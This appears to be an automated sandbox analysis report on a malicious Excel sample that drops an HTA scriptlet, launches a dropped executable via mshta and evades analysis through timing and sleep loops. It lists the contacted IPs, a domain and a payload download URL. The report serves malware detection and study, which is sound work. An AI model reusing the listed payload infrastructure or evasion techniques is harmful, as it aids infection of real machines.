Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: OutputDebugStringW count: 505
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: \KnownDlls32\Self.exE Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe Section loaded: \KnownDlls32\testapp.exe Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\ProgramData\qDialogMainChartType.exe RDTSC instruction interceptor: First address: 0000000010001332 second address: 0000000010001336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
Source: C:\ProgramData\qDialogMainChartType.exe RDTSC instruction interceptor: First address: 0000000010001336 second address: 0000000010001332 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 xor eax, eax 0x00000006 xor edx, edx 0x00000008 sub edi, esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e cmp eax, edi 0x00000010 cmovb eax, edi 0x00000013 cmp ecx, edi 0x00000015 cmovnbe ecx, edi 0x00000018 mov bl, byte ptr [esp+2Bh] 0x0000001c mov byte ptr [esp+3Bh], bl 0x00000020 mov edx, dword ptr [esp+08h] 0x00000024 add edx, 01h 0x00000027 mov esi, dword ptr [esp+2Ch] 0x0000002b cmp edx, esi 0x0000002d mov edi, ecx 0x0000002f mov esi, eax 0x00000031 mov dword ptr [esp+24h], edi 0x00000035 mov dword ptr [esp+18h], eax 0x00000039 mov dword ptr [esp+1Ch], ecx 0x0000003d mov dword ptr [esp+20h], esi 0x00000041 mov dword ptr [esp+14h], edx 0x00000045 je 00007FF638C6BCE3h 0x0000004b jmp 00007FF638C6BD3Dh 0x0000004d mov eax, dword ptr [esp+14h] 0x00000051 mov ecx, dword ptr [esp+1Ch] 0x00000055 mov edx, dword ptr [esp+18h] 0x00000059 mov dword ptr [esp+08h], eax 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 rdtsc
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\qDialogMainChartType.exe Window / User API: threadDelayed 505 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 3048 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe TID: 2220 Thread sleep count: 505 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\ProgramData\qDialogMainChartType.exe Last function: Thread delayed
Source: C:\ProgramData\qDialogMainChartType.exe Last function: Thread delayed
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10010754 GetSystemInfo, 3_2_10010754

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10019B00 LdrInitializeThunk, 3_2_10019B00
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe Jump to behavior
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\ProgramData\qDialogMainChartType.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 3_2_10006D50
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 448885 Sample: 4TWEQh2HJb Startdate: 14/07/2021 Architecture: WINDOWS Score: 100 23 66.175.217.172 LINODE-APLinodeLLCUS United States 2->23 25 78.46.78.42 HETZNER-ASDE Germany 2->25 27 202.29.60.34 CMRU-AS-APChiangmaiRajabhatUniversityTH Thailand 2->27 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->43 45 8 other signatures 2->45 8 EXCEL.EXE 53 14 2->8         started        signatures3 process4 file5 19 C:\...\qRangeAutoFormatLocalFormat3.sct, HTML 8->19 dropped 47 Document exploit detected (creates forbidden files) 8->47 49 Microsoft Office creates scripting files 8->49 12 mshta.exe 10 8->12         started        signatures6 process7 dnsIp8 29 onlinefastsolutions.com 208.83.69.35, 49165, 8088 CLEAR-RATE-COMMUNICATIONSUS United States 12->29 21 C:\ProgramData\qDialogMainChartType.exe, PE32 12->21 dropped 16 qDialogMainChartType.exe 12->16         started        file9 process10 signatures11 31 Multi AV Scanner detection for dropped file 16->31 33 Detected unpacking (changes PE section rights) 16->33 35 Detected unpacking (overwrites its own PE header) 16->35 37 4 other signatures 16->37
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
78.46.78.42
 unknown Germany
24940 HETZNER-ASDE true
208.83.69.35
 onlinefastsolutions.com United States
22438 CLEAR-RATE-COMMUNICATIONSUS false
202.29.60.34
 unknown Thailand
24344 CMRU-AS-APChiangmaiRajabhatUniversityTH true
66.175.217.172
 unknown United States
63949 LINODE-APLinodeLLCUS true

Contacted Domains

Name IP Active
onlinefastsolutions.com 208.83.69.35 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://onlinefastsolutions.com:8088/tpls/file3.bin false
  • Avira URL Cloud: safe
 unknown